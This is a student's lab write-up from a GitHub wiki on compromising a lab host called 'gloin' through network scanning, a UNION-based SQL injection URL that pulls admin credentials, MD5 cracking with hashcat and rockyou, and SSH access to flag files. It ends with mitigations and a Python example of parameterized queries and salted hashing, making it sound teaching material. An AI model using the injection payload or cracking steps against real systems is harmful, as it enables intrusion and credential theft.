# Week 9: Lab 9.2 Exploiting Gloin

From the FlameSpyro/Tech-Journal GitHub Wiki.
## Target IP Address

- Run an nmap ping sweep. You'll notice there are new IPs in the network (.26-.32).

```
nmap 10.0.5.0-254 -sP
```

- We can find which one is gloin by running nslookup against each new address, using the DNS server at .22.

```
nslookup 10.0.5.31 10.0.5.22
```

- .31 is revealed to be gloin.
## Open Ports

- Running an nmap service scan will show a new service on port 3389.
- 3389 is Microsoft Terminal Services (RDP) and is relevant for our exploit.

```
sudo nmap 10.0.5.31 -sV
```
## Discovered Vulnerability

- I literally searched "ms-wbt-server exploit 3389" and got this link.
- Specifically, the following:

```
nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 10.0.5.31
```
## How you achieved a foothold

- Running dirb will tell you about hidden pages.

```
dirb http://10.0.5.31/entrance_exam -r -w
```

- I took the Entrance Exam into exploitdb to find an exploit.
- I injected the following into my URL:

```
https://10.0.5.31/entrance_exam/admin/view_enrollee.php id=1'+UNION+SELECT+1,2,3,4,5,6,password,username,9,10,11,12,13,14,15+FROM+admin_list;
```

- You are then given a page with a hashed email.
## How you achieved Admin compromise

- Copy and paste the hash into a file.
- hashcat will be used (mode 0, MD5).

```
echo "4214db3884e9cd913b49b5b44e49ae96" > gloin.txt
hashcat -m 0 -a 0 -o gloinlist.txt gloin.txt /usr/share/wordlists/rockyou.txt
```
## User Flag

```
ssh [email protected]
cd ..
cd gloin
cat user-flag.txt
```
## Root Flag

```
cd Administrator
cat root-flag.txt
```
## How might the vulnerabilities be mitigated by the systems administrator and developer?

- The first method that comes to mind is to enforce a complex password policy, such as requiring special characters and a longer minimum length, so the admin hash can't be recovered from a wordlist like rockyou.
- Exploit DB shows that the exploit works because of the site's default settings. Modifying the website (in particular, how the `id` parameter reaches the database query) could prevent the exploit used.
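To make the two mitigations concrete, here is an added example (not code from the lab's web application, whose source is not on this page) showing the developer-side fix: the `id` lookup is type-checked and bound as a query parameter instead of being spliced into the SQL, and the admin password is stored with a salted, slow hash rather than bare MD5. The table names follow the write-up; the column layout and the in-memory SQLite database are assumptions for the demo.

```python
import hashlib
import hmac
import os
import sqlite3


def hash_password(password, salt=None):
    # Salted PBKDF2 instead of bare MD5: every guess costs 200k iterations,
    # and cracking one hash gives nothing reusable against another admin.
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000)
    return salt.hex() + "$" + digest.hex()


def verify_password(stored, password):
    # Recompute with the stored salt and compare in constant time.
    salt_hex, _ = stored.split("$")
    candidate = hash_password(password, bytes.fromhex(salt_hex))
    return hmac.compare_digest(candidate, stored)


def build_db():
    # Constructed stand-in for the lab database: an enrollee table and the
    # admin_list table the injected query targeted. Sample rows are made up.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE enrollee (id INTEGER PRIMARY KEY, name TEXT)")
    db.execute("CREATE TABLE admin_list (username TEXT, password TEXT)")
    db.execute("INSERT INTO enrollee VALUES (1, 'sample enrollee')")
    db.execute("INSERT INTO admin_list VALUES ('admin', ?)",
               (hash_password("correct horse battery staple"),))
    return db


def view_enrollee(db, raw_id):
    # Hardened lookup: reject anything that is not an integer, then bind the
    # value as a parameter. The input never becomes part of the SQL text, so a
    # quote or UNION inside it cannot change the statement; it just matches
    # no row and the caller gets None.
    try:
        enrollee_id = int(raw_id)
    except (TypeError, ValueError):
        return None
    return db.execute("SELECT id, name FROM enrollee WHERE id = ?",
                      (enrollee_id,)).fetchone()
```

Compare this with a query built by string concatenation, where the `'` in the lab payload closes the literal and the appended `UNION SELECT` pulls rows from `admin_list` into the enrollee page.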
## Reflection

- Overall this lab was really cool, as I felt I had a consistent flow of things and problem solving! I did have a little help from a friend with using dirb and fixing my hashcat a bit.